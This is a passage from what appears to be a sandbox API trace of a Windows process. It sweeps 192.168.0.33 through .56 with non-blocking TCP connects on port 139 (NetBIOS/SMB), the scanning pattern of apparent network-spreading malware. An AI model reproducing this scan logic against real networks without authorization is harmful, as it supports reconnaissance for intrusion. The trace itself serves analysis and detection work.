ioctlsocket (in: s=0x47c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0152.829] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0153.843] __WSAFDIsSet (param_1=0x47c, param_2=0x346f960) returned 0 [0153.843] GetLastError () returned 0x0 [0153.843] SetLastError (dwErrCode=0x0) [0153.843] GetLastError () returned 0x0 [0153.843] SetLastError (dwErrCode=0x0) [0153.843] htonl (hostlong=0xc0a80021) returned 0x2100a8c0 [0153.843] inet_ntoa (in=0x2100a8c0) returned="192.168.0.33" [0153.843] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0153.844] socket (af=2, type=1, protocol=6) returned 0x488 [0153.844] inet_addr (cp="192.168.0.33") returned 0x2100a8c0 [0153.844] htons (hostshort=0x8b) returned 0x8b00 [0153.844] ioctlsocket (in: s=0x488, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0153.844] connect (s=0x488, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.33"), namelen=16) returned -1 [0153.844] ioctlsocket (in: s=0x488, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0153.844] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0154.857] __WSAFDIsSet (param_1=0x488, param_2=0x346f960) returned 0 [0154.857] GetLastError () returned 0x0 [0154.857] SetLastError (dwErrCode=0x0) [0154.857] GetLastError () returned 0x0 [0154.857] SetLastError (dwErrCode=0x0) [0154.857] htonl (hostlong=0xc0a80022) returned 0x2200a8c0 [0154.857] inet_ntoa (in=0x2200a8c0) returned="192.168.0.34" [0154.857] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0154.857] socket (af=2, type=1, protocol=6) returned 0x454 [0154.857] inet_addr (cp="192.168.0.34") returned 0x2200a8c0 [0154.858] htons (hostshort=0x8b) returned 0x8b00 [0154.858] ioctlsocket (in: s=0x454, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0154.858] connect (s=0x454, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.34"), namelen=16) returned -1 [0154.858] ioctlsocket (in: s=0x454, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0154.858] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0155.870] __WSAFDIsSet (param_1=0x454, param_2=0x346f960) returned 0 [0155.870] GetLastError () returned 0x0 [0155.871] SetLastError (dwErrCode=0x0) [0155.871] GetLastError () returned 0x0 [0155.871] SetLastError (dwErrCode=0x0) [0155.871] htonl (hostlong=0xc0a80023) returned 0x2300a8c0 [0155.871] inet_ntoa (in=0x2300a8c0) returned="192.168.0.35" [0155.871] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0155.871] socket (af=2, type=1, protocol=6) returned 0x48c [0155.871] inet_addr (cp="192.168.0.35") returned 0x2300a8c0 [0155.871] htons (hostshort=0x8b) returned 0x8b00 [0155.871] ioctlsocket (in: s=0x48c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0155.871] connect (s=0x48c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.35"), namelen=16) returned -1 [0155.872] ioctlsocket (in: s=0x48c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0155.872] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0156.885] __WSAFDIsSet (param_1=0x48c, param_2=0x346f960) returned 0 [0156.885] GetLastError () returned 0x0 [0156.885] SetLastError (dwErrCode=0x0) [0156.885] GetLastError () returned 0x0 [0156.885] SetLastError (dwErrCode=0x0) [0156.885] htonl (hostlong=0xc0a80024) returned 0x2400a8c0 [0156.885] inet_ntoa (in=0x2400a8c0) returned="192.168.0.36" [0156.885] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0156.885] socket (af=2, type=1, protocol=6) returned 0x45c [0156.886] inet_addr (cp="192.168.0.36") returned 0x2400a8c0 [0156.886] htons (hostshort=0x8b) returned 0x8b00 [0156.886] ioctlsocket (in: s=0x45c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0156.886] connect (s=0x45c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.36"), namelen=16) returned -1 [0156.886] ioctlsocket (in: s=0x45c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0156.886] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0157.899] __WSAFDIsSet (param_1=0x45c, param_2=0x346f960) returned 0 [0157.899] GetLastError () returned 0x0 [0157.899] SetLastError (dwErrCode=0x0) [0157.899] GetLastError () returned 0x0 [0157.899] SetLastError (dwErrCode=0x0) [0157.899] htonl (hostlong=0xc0a80025) returned 0x2500a8c0 [0157.899] inet_ntoa (in=0x2500a8c0) returned="192.168.0.37" [0157.899] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0157.899] socket (af=2, type=1, protocol=6) returned 0x4a0 [0157.900] inet_addr (cp="192.168.0.37") returned 0x2500a8c0 [0157.900] htons (hostshort=0x8b) returned 0x8b00 [0157.900] ioctlsocket (in: s=0x4a0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0157.900] connect (s=0x4a0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.37"), namelen=16) returned -1 [0157.900] ioctlsocket (in: s=0x4a0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0157.900] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0158.913] __WSAFDIsSet (param_1=0x4a0, param_2=0x346f960) returned 0 [0158.913] GetLastError () returned 0x0 [0158.913] SetLastError (dwErrCode=0x0) [0158.913] GetLastError () returned 0x0 [0158.913] SetLastError (dwErrCode=0x0) [0158.913] htonl (hostlong=0xc0a80026) returned 0x2600a8c0 [0158.913] inet_ntoa (in=0x2600a8c0) returned="192.168.0.38" [0158.913] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0158.913] socket (af=2, type=1, protocol=6) returned 0x4a4 [0158.913] inet_addr (cp="192.168.0.38") returned 0x2600a8c0 [0158.913] htons (hostshort=0x8b) returned 0x8b00 [0158.913] ioctlsocket (in: s=0x4a4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0158.913] connect (s=0x4a4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.38"), namelen=16) returned -1 [0158.914] ioctlsocket (in: s=0x4a4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0158.914] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0159.929] __WSAFDIsSet (param_1=0x4a4, param_2=0x346f960) returned 0 [0159.929] GetLastError () returned 0x0 [0159.929] SetLastError (dwErrCode=0x0) [0159.929] GetLastError () returned 0x0 [0159.929] SetLastError (dwErrCode=0x0) [0159.929] htonl (hostlong=0xc0a80027) returned 0x2700a8c0 [0159.929] inet_ntoa (in=0x2700a8c0) returned="192.168.0.39" [0159.929] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0159.929] socket (af=2, type=1, protocol=6) returned 0x4bc [0159.929] inet_addr (cp="192.168.0.39") returned 0x2700a8c0 [0159.929] htons (hostshort=0x8b) returned 0x8b00 [0159.929] ioctlsocket (in: s=0x4bc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0159.929] connect (s=0x4bc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.39"), namelen=16) returned -1 [0159.930] ioctlsocket (in: s=0x4bc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0159.930] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 1 [0159.930] __WSAFDIsSet (param_1=0x4bc, param_2=0x346f960) returned 1 [0159.930] GetLastError () returned 0x0 [0159.930] SetLastError (dwErrCode=0x0) [0159.930] GetLastError () returned 0x0 [0159.930] SetLastError (dwErrCode=0x0) [0159.930] htonl (hostlong=0xc0a80028) returned 0x2800a8c0 [0159.930] inet_ntoa (in=0x2800a8c0) returned="192.168.0.40" [0159.930] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0159.930] socket (af=2, type=1, protocol=6) returned 0x4c4 [0159.930] inet_addr (cp="192.168.0.40") returned 0x2800a8c0 [0159.930] htons (hostshort=0x8b) returned 0x8b00 [0159.930] ioctlsocket (in: s=0x4c4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0159.930] connect (s=0x4c4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.40"), namelen=16) returned -1 [0159.930] ioctlsocket (in: s=0x4c4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0159.930] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0160.940] __WSAFDIsSet (param_1=0x4c4, param_2=0x346f960) returned 0 [0160.940] GetLastError () returned 0x0 [0160.940] SetLastError (dwErrCode=0x0) [0160.940] GetLastError () returned 0x0 [0160.940] SetLastError (dwErrCode=0x0) [0160.940] htonl (hostlong=0xc0a80029) returned 0x2900a8c0 [0160.940] inet_ntoa (in=0x2900a8c0) returned="192.168.0.41" [0160.940] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0160.940] socket (af=2, type=1, protocol=6) returned 0x4d4 [0160.940] inet_addr (cp="192.168.0.41") returned 0x2900a8c0 [0160.940] htons (hostshort=0x8b) returned 0x8b00 [0160.940] ioctlsocket (in: s=0x4d4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0160.940] connect (s=0x4d4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.41"), namelen=16) returned -1 [0160.941] ioctlsocket (in: s=0x4d4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0160.941] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0161.955] __WSAFDIsSet (param_1=0x4d4, param_2=0x346f960) returned 0 [0161.955] GetLastError () returned 0x0 [0161.955] SetLastError (dwErrCode=0x0) [0161.955] GetLastError () returned 0x0 [0161.955] SetLastError (dwErrCode=0x0) [0161.955] htonl (hostlong=0xc0a8002a) returned 0x2a00a8c0 [0161.955] inet_ntoa (in=0x2a00a8c0) returned="192.168.0.42" [0161.955] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0161.955] socket (af=2, type=1, protocol=6) returned 0x4dc [0161.956] inet_addr (cp="192.168.0.42") returned 0x2a00a8c0 [0161.956] htons (hostshort=0x8b) returned 0x8b00 [0161.956] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0161.956] connect (s=0x4dc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.42"), namelen=16) returned -1 [0161.956] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0161.956] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0162.968] __WSAFDIsSet (param_1=0x4dc, param_2=0x346f960) returned 0 [0162.968] GetLastError () returned 0x0 [0162.968] SetLastError (dwErrCode=0x0) [0162.968] GetLastError () returned 0x0 [0162.968] SetLastError (dwErrCode=0x0) [0162.968] htonl (hostlong=0xc0a8002b) returned 0x2b00a8c0 [0162.968] inet_ntoa (in=0x2b00a8c0) returned="192.168.0.43" [0162.968] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0162.968] socket (af=2, type=1, protocol=6) returned 0x4cc [0162.968] inet_addr (cp="192.168.0.43") returned 0x2b00a8c0 [0162.968] htons (hostshort=0x8b) returned 0x8b00 [0162.968] ioctlsocket (in: s=0x4cc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0162.969] connect (s=0x4cc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.43"), namelen=16) returned -1 [0162.969] ioctlsocket (in: s=0x4cc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0162.969] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0163.983] __WSAFDIsSet (param_1=0x4cc, param_2=0x346f960) returned 0 [0163.983] GetLastError () returned 0x0 [0163.983] SetLastError (dwErrCode=0x0) [0163.983] GetLastError () returned 0x0 [0163.983] SetLastError (dwErrCode=0x0) [0163.983] htonl (hostlong=0xc0a8002c) returned 0x2c00a8c0 [0163.983] inet_ntoa (in=0x2c00a8c0) returned="192.168.0.44" [0163.983] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0163.983] socket (af=2, type=1, protocol=6) returned 0x4f0 [0163.983] inet_addr (cp="192.168.0.44") returned 0x2c00a8c0 [0163.983] htons (hostshort=0x8b) returned 0x8b00 [0163.983] ioctlsocket (in: s=0x4f0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0163.983] connect (s=0x4f0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.44"), namelen=16) returned -1 [0163.984] ioctlsocket (in: s=0x4f0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0163.984] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0164.996] __WSAFDIsSet (param_1=0x4f0, param_2=0x346f960) returned 0 [0164.996] GetLastError () returned 0x0 [0164.996] SetLastError (dwErrCode=0x0) [0164.996] GetLastError () returned 0x0 [0164.996] SetLastError (dwErrCode=0x0) [0164.996] htonl (hostlong=0xc0a8002d) returned 0x2d00a8c0 [0164.996] inet_ntoa (in=0x2d00a8c0) returned="192.168.0.45" [0164.996] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0164.996] socket (af=2, type=1, protocol=6) returned 0x4f4 [0164.996] inet_addr (cp="192.168.0.45") returned 0x2d00a8c0 [0164.996] htons (hostshort=0x8b) returned 0x8b00 [0164.996] ioctlsocket (in: s=0x4f4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0164.996] connect (s=0x4f4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.45"), namelen=16) returned -1 [0164.999] ioctlsocket (in: s=0x4f4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0164.999] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0166.011] __WSAFDIsSet (param_1=0x4f4, param_2=0x346f960) returned 0 [0166.011] GetLastError () returned 0x0 [0166.011] SetLastError (dwErrCode=0x0) [0166.011] GetLastError () returned 0x0 [0166.011] SetLastError (dwErrCode=0x0) [0166.011] htonl (hostlong=0xc0a8002e) returned 0x2e00a8c0 [0166.011] inet_ntoa (in=0x2e00a8c0) returned="192.168.0.46" [0166.011] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0166.011] socket (af=2, type=1, protocol=6) returned 0x500 [0166.011] inet_addr (cp="192.168.0.46") returned 0x2e00a8c0 [0166.011] htons (hostshort=0x8b) returned 0x8b00 [0166.012] ioctlsocket (in: s=0x500, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0166.012] connect (s=0x500, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.46"), namelen=16) returned -1 [0166.012] ioctlsocket (in: s=0x500, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0166.012] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0167.024] __WSAFDIsSet (param_1=0x500, param_2=0x346f960) returned 0 [0167.024] GetLastError () returned 0x0 [0167.024] SetLastError (dwErrCode=0x0) [0167.024] GetLastError () returned 0x0 [0167.024] SetLastError (dwErrCode=0x0) [0167.024] htonl (hostlong=0xc0a8002f) returned 0x2f00a8c0 [0167.024] inet_ntoa (in=0x2f00a8c0) returned="192.168.0.47" [0167.024] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0167.024] socket (af=2, type=1, protocol=6) returned 0x508 [0167.024] inet_addr (cp="192.168.0.47") returned 0x2f00a8c0 [0167.024] htons (hostshort=0x8b) returned 0x8b00 [0167.024] ioctlsocket (in: s=0x508, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0167.024] connect (s=0x508, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.47"), namelen=16) returned -1 [0167.025] ioctlsocket (in: s=0x508, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0167.025] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0168.038] __WSAFDIsSet (param_1=0x508, param_2=0x346f960) returned 0 [0168.038] GetLastError () returned 0x0 [0168.038] SetLastError (dwErrCode=0x0) [0168.038] GetLastError () returned 0x0 [0168.038] SetLastError (dwErrCode=0x0) [0168.038] htonl (hostlong=0xc0a80030) returned 0x3000a8c0 [0168.038] inet_ntoa (in=0x3000a8c0) returned="192.168.0.48" [0168.038] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0168.038] socket (af=2, type=1, protocol=6) returned 0x4e4 [0168.039] inet_addr (cp="192.168.0.48") returned 0x3000a8c0 [0168.039] htons (hostshort=0x8b) returned 0x8b00 [0168.039] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0168.039] connect (s=0x4e4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.48"), namelen=16) returned -1 [0168.039] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0168.039] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0169.054] __WSAFDIsSet (param_1=0x4e4, param_2=0x346f960) returned 0 [0169.054] GetLastError () returned 0x0 [0169.054] SetLastError (dwErrCode=0x0) [0169.054] GetLastError () returned 0x0 [0169.054] SetLastError (dwErrCode=0x0) [0169.054] htonl (hostlong=0xc0a80031) returned 0x3100a8c0 [0169.054] inet_ntoa (in=0x3100a8c0) returned="192.168.0.49" [0169.054] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0169.054] socket (af=2, type=1, protocol=6) returned 0x51c [0169.054] inet_addr (cp="192.168.0.49") returned 0x3100a8c0 [0169.054] htons (hostshort=0x8b) returned 0x8b00 [0169.054] ioctlsocket (in: s=0x51c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0169.054] connect (s=0x51c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.49"), namelen=16) returned -1 [0169.054] ioctlsocket (in: s=0x51c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0169.055] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0170.134] __WSAFDIsSet (param_1=0x51c, param_2=0x346f960) returned 0 [0170.134] GetLastError () returned 0x0 [0170.134] SetLastError (dwErrCode=0x0) [0170.134] GetLastError () returned 0x0 [0170.134] SetLastError (dwErrCode=0x0) [0170.134] htonl (hostlong=0xc0a80032) returned 0x3200a8c0 [0170.135] inet_ntoa (in=0x3200a8c0) returned="192.168.0.50" [0170.135] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0170.135] socket (af=2, type=1, protocol=6) returned 0x518 [0170.135] inet_addr (cp="192.168.0.50") returned 0x3200a8c0 [0170.135] htons (hostshort=0x8b) returned 0x8b00 [0170.135] ioctlsocket (in: s=0x518, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0170.135] connect (s=0x518, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.50"), namelen=16) returned -1 [0170.136] ioctlsocket (in: s=0x518, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0170.136] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0171.143] __WSAFDIsSet (param_1=0x518, param_2=0x346f960) returned 0 [0171.143] GetLastError () returned 0x0 [0171.143] SetLastError (dwErrCode=0x0) [0171.143] GetLastError () returned 0x0 [0171.143] SetLastError (dwErrCode=0x0) [0171.144] htonl (hostlong=0xc0a80033) returned 0x3300a8c0 [0171.144] inet_ntoa (in=0x3300a8c0) returned="192.168.0.51" [0171.144] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0171.144] socket (af=2, type=1, protocol=6) returned 0x520 [0171.144] inet_addr (cp="192.168.0.51") returned 0x3300a8c0 [0171.144] htons (hostshort=0x8b) returned 0x8b00 [0171.144] ioctlsocket (in: s=0x520, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0171.144] connect (s=0x520, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.51"), namelen=16) returned -1 [0171.144] ioctlsocket (in: s=0x520, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0171.144] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0172.157] __WSAFDIsSet (param_1=0x520, param_2=0x346f960) returned 0 [0172.157] GetLastError () returned 0x0 [0172.157] SetLastError (dwErrCode=0x0) [0172.157] GetLastError () returned 0x0 [0172.157] SetLastError (dwErrCode=0x0) [0172.157] htonl (hostlong=0xc0a80034) returned 0x3400a8c0 [0172.157] inet_ntoa (in=0x3400a8c0) returned="192.168.0.52" [0172.157] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0172.157] socket (af=2, type=1, protocol=6) returned 0x4a8 [0172.157] inet_addr (cp="192.168.0.52") returned 0x3400a8c0 [0172.157] htons (hostshort=0x8b) returned 0x8b00 [0172.157] ioctlsocket (in: s=0x4a8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0172.157] connect (s=0x4a8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.52"), namelen=16) returned -1 [0172.158] ioctlsocket (in: s=0x4a8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0172.158] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0173.173] __WSAFDIsSet (param_1=0x4a8, param_2=0x346f960) returned 0 [0173.173] GetLastError () returned 0x0 [0173.173] SetLastError (dwErrCode=0x0) [0173.173] GetLastError () returned 0x0 [0173.173] SetLastError (dwErrCode=0x0) [0173.174] htonl (hostlong=0xc0a80035) returned 0x3500a8c0 [0173.174] inet_ntoa (in=0x3500a8c0) returned="192.168.0.53" [0173.174] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0173.174] socket (af=2, type=1, protocol=6) returned 0x52c [0173.174] inet_addr (cp="192.168.0.53") returned 0x3500a8c0 [0173.174] htons (hostshort=0x8b) returned 0x8b00 [0173.174] ioctlsocket (in: s=0x52c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0173.174] connect (s=0x52c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.53"), namelen=16) returned -1 [0173.174] ioctlsocket (in: s=0x52c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0173.174] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0174.187] __WSAFDIsSet (param_1=0x52c, param_2=0x346f960) returned 0 [0174.187] GetLastError () returned 0x0 [0174.187] SetLastError (dwErrCode=0x0) [0174.187] GetLastError () returned 0x0 [0174.187] SetLastError (dwErrCode=0x0) [0174.187] htonl (hostlong=0xc0a80036) returned 0x3600a8c0 [0174.187] inet_ntoa (in=0x3600a8c0) returned="192.168.0.54" [0174.187] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0174.187] socket (af=2, type=1, protocol=6) returned 0x530 [0174.187] inet_addr (cp="192.168.0.54") returned 0x3600a8c0 [0174.187] htons (hostshort=0x8b) returned 0x8b00 [0174.187] ioctlsocket (in: s=0x530, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0174.187] connect (s=0x530, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.54"), namelen=16) returned -1 [0174.187] ioctlsocket (in: s=0x530, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0174.187] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0175.199] __WSAFDIsSet (param_1=0x530, param_2=0x346f960) returned 0 [0175.199] GetLastError () returned 0x0 [0175.199] SetLastError (dwErrCode=0x0) [0175.199] GetLastError () returned 0x0 [0175.199] SetLastError (dwErrCode=0x0) [0175.199] htonl (hostlong=0xc0a80037) returned 0x3700a8c0 [0175.199] inet_ntoa (in=0x3700a8c0) returned="192.168.0.55" [0175.199] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0175.199] socket (af=2, type=1, protocol=6) returned 0x538 [0175.199] inet_addr (cp="192.168.0.55") returned 0x3700a8c0 [0175.199] htons (hostshort=0x8b) returned 0x8b00 [0175.199] ioctlsocket (in: s=0x538, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0175.199] connect (s=0x538, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.55"), namelen=16) returned -1 [0175.200] ioctlsocket (in: s=0x538, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0175.200] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0176.214] __WSAFDIsSet (param_1=0x538, param_2=0x346f960) returned 0 [0176.214] GetLastError () returned 0x0 [0176.214] SetLastError (dwErrCode=0x0) [0176.214] GetLastError () returned 0x0 [0176.214] SetLastError (dwErrCode=0x0) [0176.214] htonl (hostlong=0xc0a80038) returned 0x3800a8c0 [0176.214] inet_ntoa (in=0x3800a8c0) returned="192.168.0.56" [0176.214] WSAStartup (in: 